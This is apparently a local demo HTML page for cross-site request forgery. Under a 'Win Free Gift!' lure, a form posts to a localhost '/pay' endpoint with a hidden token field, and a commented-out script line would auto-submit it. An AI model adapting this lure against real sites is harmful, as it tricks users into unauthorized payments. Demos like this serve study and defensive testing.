<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CSRF Attacker</title>
</head>

<body>
    <h2>🎁Win Free Gift!</h2>
    <form action="http://localhost:4000/pay" method="post">
        <input name="csrfToken" value="12345" hidden>
        <button>Get free gift.</button>
    </form>

    <script>
        // document.querySelector('form').submit()
    </script>
</body>

</html>

<!-- http://127.0.0.1:5500/ -->